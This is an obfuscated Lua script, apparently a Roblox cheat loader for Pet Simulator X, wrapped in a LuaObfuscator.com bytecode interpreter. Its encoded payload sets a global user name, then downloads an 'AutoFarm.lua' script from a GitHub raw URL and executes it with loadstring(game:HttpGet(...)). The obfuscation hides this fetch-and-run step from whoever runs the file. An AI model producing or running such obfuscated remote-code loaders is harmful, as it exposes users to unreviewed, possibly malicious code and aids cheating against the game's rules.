--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (5==v0) then v16=nil;v16=function(v20,v21,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==6) then v38=nil;v38=function()local v48=0;local v49;local v50;local v51;local v52;local v53;local v54;local v55;local v56;while true do if (v48~=(0 + 0)) then else v49=0;v50=nil;v48=1;end if (v48~=4) then else while true do if (v49==3) then v56=nil;while true do local v111=0;local v112;while true do if (v111==0) then v112=0 + 0 ;while true do if (v112~=(1 + 0)) then else if (v50~=1) then else local v123=0 + 0 ;while true do if (v123==0) then local v129=0 -0 ;local v130;while true do if (v129==0) then v130=0 -0 ;while true do if (v130==(0 -0)) then local v161=1659 -(311 + 1348) ;while true do if (v161~=(251 -(27 + 224))) then else v54={v51,v52,nil,v53};v55=v33();v161=1 + 0 ;end if (1==v161) then v130=1040 -(611 + 428) ;break;end end end if (v130==(1732 -(390 + 1341))) then v123=1;break;end end break;end end end if (v123==1) then v56={};v50=2;break;end end end if (v50==(984 -(48 + 936))) then local v124=0;local v125;local v126;while true do if (v124==0) then v125=0 + 0 ;v126=nil;v124=1;end if (v124==(2 -1)) then while true do if (v125==(0 + 0)) then v126=0;while true do if (v126~=(1880 -(1244 + 635))) then else v53={};v50=1671 -(450 + 1220) ;break;end if (v126==0) then local v162=0;local v163;while true do if ((0 -0)~=v162) then else v163=0;while true do if (v163==0) then local v179=0 -0 ;while true do if (v179~=1) then else v163=2 -1 ;break;end if (v179~=(579 -(105 + 474))) then else v51={};v52={};v179=1 + 0 ;end end end if (v163~=(3 -2)) then else v126=1 + 0 ;break;end end break;end end end end break;end end break;end end end break;end if (v112~=(0 -0)) then else local v121=0;local v122;while true do if (v121==(0 -0)) then v122=0 + 0 ;while true do if (v122==0) then if (v50~=(455 -(437 + 15))) then else local v152=0 + 0 ;while true do local v155=0 + 0 ;while true do if (v155==0) then if (v152~=(1 + 0)) then else return v54;end if (v152~=0) then else local v168=0;local v169;while true do if (v168~=(1471 -(1121 + 350))) then else v169=0;while true do if (v169~=1) then else v152=922 -(451 + 470) ;break;end if (v169==0) then local v191=337 -(58 + 279) ;while true do if (v191==(250 -(243 + 7))) then for v195=1,v33() do v52[v195-1 ]=v38();end for v197=1,v33() do v53[v197]=v33();end v191=1 -0 ;end if (v191==1) then v169=1;break;end end end end break;end end end break;end end end end if (v50==(178 -(173 + 3))) then local v153=0;local v154;while true do if (v153~=0) then else v154=0;while true do if (v154~=0) then else local v170=0;while true do if (v170==(0 -0)) then for v185=2 -1 ,v55 do local v186=0;local v187;local v188;local v189;while true do if (v186~=1) then else v189=nil;while true do if (v187==1) then if (v188==1) then v189=v31()~=(0 + 0) ;elseif (v188==(2 + 0)) then v189=v34();elseif (v188==3) then v189=v35();end v56[v185]=v189;break;end if (v187==(57 -(8 + 49))) then local v200=0;local v201;while true do if (v200==(1462 -(14 + 1448))) then v201=0 -0 ;while true do if (v201~=(1 + 0)) then else v187=1;break;end if (v201==(0 + 0)) then local v213=501 -(42 + 459) ;while true do if (v213~=1) then else v201=1841 -(1392 + 448) ;break;end if (v213~=(0 + 0)) then else v188=v31();v189=nil;v213=1;end end end end break;end end end end break;end if (v186==0) then local v192=0 -0 ;while true do if ((0 + 0)==v192) then local v202=0 + 0 ;while true do if (v202==0) then v187=0;v188=nil;v202=1 -0 ;end if (v202~=(1865 -(525 + 1339))) then else v192=1;break;end end end if (v192~=(1 + 0)) then else v186=1;break;end end end end end v54[1 + 2 ]=v31();v170=1;end if (v170==(1 -0)) then v154=1;break;end end end if (v154~=1) then else for v171=1,v33() do local v172=0;local v173;local v174;local v175;while true do if (v172==1) then v175=nil;while true do if (v173~=(0 + 0)) then else local v193=0;while true do if (v193==(1 + 0)) then v173=1;break;end if (v193==0) then v174=0;v175=nil;v193=1;end end end if (v173~=1) then else while true do if (0==v174) then v175=v31();if (v30(v175,1186 -(464 + 721) ,1)==0) then local v203=0;local v204;local v205;local v206;local v207;while true do if (0==v203) then local v210=1826 -(152 + 1674) ;local v211;while true do if (v210==0) then v211=0;while true do if (v211==0) then local v224=0 -0 ;while true do if (v224==(1 + 0)) then v211=2 -1 ;break;end if (v224==0) then v204=0;v205=nil;v224=3 -2 ;end end end if (v211==(1 + 0)) then v203=1;break;end end break;end end end if (v203~=(3 -2)) then else local v212=0;while true do if (v212==1) then v203=2;break;end if (v212~=0) then else v206=nil;v207=nil;v212=1 -0 ;end end end if (2~=v203) then else while true do if (v204==1) then local v214=0;local v215;local v216;while true do if (v214==(0 -0)) then v215=1984 -(1184 + 800) ;v216=nil;v214=2 -1 ;end if (v214~=1) then else while true do if (v215==0) then v216=0;while true do if (v216==0) then local v231=0;local v232;while true do if (v231~=(0 -0)) then else v232=0;while true do if (v232==(0 + 0)) then local v233=0 + 0 ;while true do if (v233==(1 + 0)) then v232=618 -(578 + 39) ;break;end if (v233~=(0 + 0)) then else v207={v32(),v32(),nil,nil};if (v205==0) then local v234=86 -(83 + 3) ;local v235;while true do if (v234==0) then v235=495 -(42 + 453) ;while true do if (v235==(0 -0)) then v207[1214 -(40 + 1171) ]=v32();v207[518 -(389 + 125) ]=v32();break;end end break;end end elseif (v205==1) then v207[736 -(389 + 344) ]=v33();elseif (v205==2) then v207[3]=v33() -((1445 -(409 + 1034))^(29 -13)) ;elseif (v205==(3 + 0)) then local v240=0;local v241;while true do if (v240~=(0 -0)) then else v241=0 -0 ;while true do if (v241==(1719 -(1127 + 592))) then v207[3]=v33() -((5 -3)^(1126 -(583 + 527))) ;v207[4]=v32();break;end end break;end end end v233=1;end end end if (v232==1) then v216=1;break;end end break;end end end if (v216~=(1036 -(668 + 367))) then else v204=2;break;end end break;end end break;end end end if (v204==(2 + 0)) then local v217=0;local v218;while true do if (v217~=(0 -0)) then else v218=0;while true do if (v218==1) then v204=3 + 0 ;break;end if (v218~=(0 + 0)) then else if (v30(v206,1,1)~=1) then else v207[4 -2 ]=v56[v207[215 -(89 + 124) ]];end if (v30(v206,8 -6 ,2)~=(23 -(9 + 13))) then else v207[211 -(161 + 47) ]=v56[v207[138 -(82 + 53) ]];end v218=1;end end break;end end end if (v204~=0) then else local v219=0 + 0 ;local v220;while true do if (v219~=(0 + 0)) then else v220=0 -0 ;while true do if (v220~=1) then else v204=1 + 0 ;break;end if (v220~=0) then else local v225=0;local v226;while true do if (v225~=(128 -(18 + 110))) then else v226=0 -0 ;while true do if (v226==(1 + 0)) then v220=1 + 0 ;break;end if (v226==0) then v205=v30(v175,2,3);v206=v30(v175,4,6);v226=1;end end break;end end end end break;end end end if (v204==(2 + 1)) then if (v30(v206,2 + 1 ,3)~=1) then else v207[4]=v56[v207[599 -(458 + 137) ]];end v51[v171]=v207;break;end end break;end end end break;end end break;end end break;end if (v172==(0 -0)) then v173=0 + 0 ;v174=nil;v172=3 -2 ;end end end v50=317 -(101 + 213) ;break;end end break;end end end v122=1;end if (v122==(1361 -(422 + 938))) then v112=1;break;end end break;end end end end break;end end end break;end if (v49==2) then local v103=1647 -(399 + 1248) ;while true do if (v103==(0 + 0)) then v54=nil;v55=nil;v103=1 + 0 ;end if (v103==1) then v49=3;break;end end end if (v49==1) then local v104=0 + 0 ;local v105;while true do if (v104~=(0 -0)) then else v105=0 + 0 ;while true do if (v105==0) then local v119=0;while true do if (v119==1) then v105=2 -1 ;break;end if ((1323 -(1294 + 29))==v119) then v52=nil;v53=nil;v119=1;end end end if (v105==1) then v49=2;break;end end break;end end end if (v49==0) then local v106=0 + 0 ;while true do if (v106==(1 + 0)) then v49=1;break;end if (v106==(1986 -(859 + 1127))) then v50=0;v51=nil;v106=1;end end end end break;end if (v48==(2 -1)) then v51=nil;v52=nil;v48=790 -(173 + 615) ;end if (v48==(12 -9)) then v55=nil;v56=nil;v48=1348 -(946 + 398) ;end if (v48==2) then v53=nil;v54=nil;v48=3;end end end;v39=nil;v27=7;end if (2==v27) then v31=function()local v57=v2(v20,v28,v28);v28=v28 + 1 ;return v57;end;v32=nil;v32=function()local v58,v59=v2(v20,v28,v28 + 1 + 1 );v28=v28 + 2 ;return (v59 * (153 + 103)) + v58 ;end;v27=3;end if (v27==4) then v34=function()local v60=v33();local v61=v33();local v62=1855 -(22 + 1832) ;local v63=(v30(v61,1,9 + 10 + 1 ) * ((2 + 0)^(566 -(312 + 222)))) + v60 ;local v64=v30(v61,10 + 11 ,1296 -(841 + (1584 -(617 + 543))) );local v65=((v30(v61,562 -(84 + 446) )==(1 + 0 + 0)) and  -(1 -0)) or (645 -((1397 -828) + 75)) ;if (v64==((982 + 467) -(446 + 1003))) then if (v63==(0 + 0 + 0)) then return v65 * (0 -0) ;else local v87=(2826 -2154) -(254 + 418) ;while true do if ((0 + 0)==v87) then v64=1 + 0 ;v62=0;break;end end end elseif (v64==(2810 -(313 + 450))) then return ((v63==0) and (v65 * ((1 + 0)/(1662 -(48 + 1614))))) or (v65 * NaN) ;end return v9(v65,v64-(3302 -2279) ) * (v62 + (v63/((1 + 0 + 1)^52))) ;end;v35=nil;v35=function(v40)local v66;if  not v40 then local v78=0 + 0 ;while true do if (v78==(0 + 0)) then v40=v33();if (v40==(0 -0)) then return "";end break;end end end v66=v4(v20,v28,(v28 + v40) -(1168 -(696 + 471)) );v28=v28 + v40 ;local v67={};for v76=1 + 0 , #v66 do v67[v76]=v3(v2(v4(v66,v76,v76)));end return v7(v67);end;v27=5;end if (v27==7) then v39=function(v41,v42,v43)local v68=0;local v69;local v70;local v71;while true do if (v68==0) then v69=v41[1];v70=v41[2];v68=1;end if (v68==1) then v71=v41[3];return function(...)local v88=1;local v89= -1;local v90={...};local v91=v13("#",...) -1 ;local function v92()local v93=v69;local v94=v70;local v95=v71;local v96=v37;local v97={};local v98={};local v99={};for v107=0 + 0 ,v91 do if ((v107>=v95) or ((4740 -(447 + 301))<=(757 -441))) then v97[v107-v95 ]=v90[v107 + 1 + 0 + 0 ];else v99[v107]=v90[v107 + (1 -0) ];end end local v100=(v91-v95) + ((2083 -(471 + 138)) -(691 + 782)) ;local v101;local v102;while true do local v108=1629 -(114 + 1515) ;local v109;while true do if ((v108==(0 + (0 -0))) or ((6047 -4438)>=(3241 -1534))) then v109=1002 -(352 + (2610 -(1340 + 620))) ;while true do if ((v109==1) or (((9166 -4311) -(1150 + 652))>=(4572 -(67 + 827)))) then if (((1396 + (2072 -(221 + 368)))>(573 + 679)) and (v102<=(9 -5))) then if ((v102<=(1963 -(236 + 76 + 1164 + 486))) or ((3029 + 1750)==1088)) then if (((4077 -2198)==1879) and (v102>0)) then v99[v101[2]]=v101[2 + 1 ];else v99[v101[1810 -(159 + 1649) ]]=v43[v101[10 -7 ]];end elseif ((v102<=(6 -4)) or ((4887 -(128 + 128))==3126)) then v99[v101[1032 -(491 + 539) ]][v101[3 + 0 ]]=v101[1213 -((706 -(406 + 28)) + 937) ];elseif ((v102==(294 -(283 + 8))) or ((5897 -(675 + 1010))<(28 + 53))) then do return;end else local v138=1296 -(325 + 971) ;local v139;local v140;while true do if (((649 -357)<=(4306 -(27 + 98 + 815 + 764))) and (v138==((795 + 319) -(1043 + 70)))) then while true do if (((394 -315)<=(3709 + 403)) and (v139==(0 + 0))) then v140=v101[4 -2 ];v99[v140]=v99[v140](v14(v99,v140 + 1 + 0 ,v89));break;end end break;end if ((v138==0) or ((12776 -8464)==(6096 -3174))) then v139=(511 -293) -(173 + 45) ;v140=nil;v138=4 -3 ;end end end elseif (((10996 -6889)>=((4657 + 177) -(2484 -1601))) and (v102<=7)) then if ((v102<=(7 -2)) or ((3643 -(200 + 380))<=(7663 -4780))) then v99[v101[7 -5 ]]=v101[508 -(171 + 334) ]~=(0 + 0) ;elseif ((v102==(3 + 3)) or ((706 -417)>=(6878 -3705))) then local v141=0;local v142;local v143;local v144;local v145;local v146;local v147;while true do if (((1 + (380 -(205 + 174)))==v141) or ((7927 -4826)<(8488 -5824))) then v146=nil;v147=nil;v141=3;end if (((389 + 218 + 266)<(170 + 4250)) and (v141==(1 + 0))) then v144=nil;v145=nil;v141=3 -1 ;end if (((5916 -4014)>31) and (0==v141)) then v142=0 -0 ;v143=nil;v141=1 + 0 ;end if (((10 -7)==v141) or ((153 + (491 -295))>(288 + 1680 + 642))) then while true do if ((v142==(458 -(295 + 163))) or ((582 -(41 + 46))==(2295 + 1119))) then v143=0 -0 ;v144=nil;v142=1473 -(483 + 989) ;end if (((6621 -(1521 + 348))>(4388 -(182 + 1373))) and (v142==(1 + 0))) then v145=nil;v146=nil;v142=2;end if (((17 + (985 -(29 + 14)))==(1954 -995)) and ((1 + 1)==v142)) then v147=nil;while true do if ((v143==(0 + 0)) or ((12764 -7866)<=(4632 -2450))) then local v176=183 -(97 + 86) ;local v177;while true do if (((917 + 2208)>2894) and (v176==(723 -(365 + 358)))) then v177=0;while true do if ((v177==(536 -(267 + 268))) or ((9782 -(25912 -19584))<=(239 + 1846))) then v143=1 + 0 ;break;end if ((v177==(1179 -(676 + 503))) or ((5699 -(568 + 1071 + 140))<=(680 -((956 -598) + 99)))) then v144=v101[2 + 0 ];v145,v146=v96(v99[v144](v14(v99,v144 + 1 ,v101[(11 + 2) -10 ])));v177=1 + 0 ;end end break;end end end if ((963==(3036 -2073)) and (v143==(4 -2))) then for v181=v144,v89 do local v182=1289 -(1051 + 238) ;local v183;local v184;while true do if ((v182==(1682 -(833 + 849))) or ((5573 -(998 + 235))<=((5564 -(1465 + 96)) -(194 + (5203 -3732))))) then v183=0 + 0 ;v184=nil;v182=914 -(628 + (1011 -726)) ;end if ((v182==((1475 -653) -(456 + 365))) or (3146>(5905 -(531 + 1194)))) then while true do if ((v183==(1298 -(1133 + 165))) or ((4383 -1159)>(4825 -(358 + 334)))) then v184=0 -0 ;while true do if (((1 + 392)==393) and (v184==(0 + 0))) then v147=v147 + (2 -1) ;v99[v181]=v145[v147];break;end end break;end end break;end end end break;end if (((785 + 84 + 482)<=(3922 -(285 + 141))) and (v143==(1 + 0))) then local v178=0;while true do if ((v178==((1 -0) + (0 -0))) or ((5951 -3009)>(3428 -(433 + 25)))) then v143=716 -(311 + 403) ;break;end if ((v178==(1285 -(931 + 354))) or ((64 + 3223)<(143 + (2088 -(594 + 1372))))) then local v190=1275 -(1115 + 160) ;while true do if (((5237 -(914 + 833))>=(8819 -5874)) and (v190==0)) then v89=(v146 + v144) -(384 -((19 -11) + (605 -230))) ;v147=0;v190=3 -2 ;end if ((v190==(1 -0)) or (639>=1422)) then v178=1 + 0 ;break;end end end end end end break;end end break;end end elseif ((v101[7 -5 ]==v99[v101[(1532 -1022) -((684 -(17 + 225)) + 64) ]]) or ((1711 + 419)==4296)) then v88=v88 + 1 + 0 ;else v88=v101[647 -(299 + 345) ];end elseif ((v102<=8) or ((10771 -7525)>=(7895 -2904))) then v99[v101[1680 -(1106 + 572) ]]();elseif ((v102>9) or ((1530 -(306 + 485))==((226 + 2999) -1886))) then local v148=0;local v149;local v150;while true do if ((v148==(1 -(0 -0))) or (4411<=4263)) then v99[v149 + ((4 -2) -1) ]=v150;v99[v149]=v150[v101[1648 -(228 + 278 + 1138) ]];break;end if ((v148==(0 -0)) or ((6761 -(989 + 915))<=(447 -277))) then local v160=0 + 0 ;while true do if ((v160==(0 + 0)) or (4804<=(4245 -(83 + 162)))) then v149=v101[1 + 1 ];v150=v99[v101[2 + 0 + 1 ]];v160=2 -(959 -(847 + 111)) ;end if ((v160==(29 -(23 + 5))) or ((1087 + 104)>(493 + 1889))) then v148=1 + 0 ;break;end end end end else v88=v101[7 -4 ];end v88=v88 + 1 + 0 ;break;end if (((2909 -(117 + 83))>=(2036 -(1387 + 423))) and (0==v109)) then local v120=(254 + 361) -(289 + 326) ;while true do if (((18528 -14085)>2027) and (v120==(1 + 0))) then v109=258 -(193 + 64) ;break;end if (((5138 -3846)<(5199 -(930 + 954))) and (v120==(0 + 0))) then v101=v93[v88];v102=v101[1];v120=(2 -1) + 0 ;end end end end break;end end end end A,B=v37(v12(v92));if  not A[1] then local v110=v41[4][v88] or "?" ;error("Script error at ["   .. v110   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end end end;return v39(v38(),{},v21)(...);end if (v27==1) then v30=nil;v30=function(v44,v45,v46)if v46 then local v79=0;local v80;while true do if (v79==(176 -(49 + 127))) then v80=(v44/((2 + (1432 -(280 + 1152)))^(v45-(1 -0))))%(((1212 -(887 + 319)) -4)^(((v46-(494 -(269 + (506 -282)))) -(v45-(1 + 0))) + (3 -2))) ;return v80-(v80%(1 + 0)) ;end end else local v81=(2 + 0)^(v45-(4 -3)) ;return (((v44%(v81 + v81))>=v81) and (399 -((431 -271) + 238))) or ((1203 -894) -(96 + 213)) ;end end;v31=nil;v27=2;end if (v27==0) then v28=1;v29=nil;v20=v5(v4(v20,5),"..",function(v47)if (v2(v47,2)==79) then v29=v1(v4(v47,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v3(v1(v47,16));if v29 then local v113=0;local v114;while true do if (v113==0) then v114=v6(v83,v29);v29=nil;v113=1;end if (v113==1) then return v114;end end else return v83;end break;end end end end);v27=1;end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (v27==3) then v33=nil;v33=function()local v72,v73,v74,v75=v2(v20,v28,v28 + 3 + 0 );v28=v28 + (8 -4) ;return (v75 * ((6255129 + 10523558) -(969 + 502))) + (v74 * (65836 -(80 + 220))) + (v73 * 256) + v72 ;end;v34=nil;v27=4;end end end;v16("LOL!083O00028O0003023O005F4703083O00557365724E616D65030D3O0053616966456C61626432303130030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C756100103O0012013O00013O000E070001000100013O0004093O0001000100122O000100023O00300200010003000400122O000100053O00122O000200063O00200A000200020007001201000400084O0005000500014O0006000200054O000400013O00022O00080001000100010004093O000F00010004093O000100012O00033O00017O00103O00023O00043O00043O00053O00053O00063O00063O00063O00063O00063O00063O00063O00063O00073O00083O000A3O00",v10(),...);break;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end end end
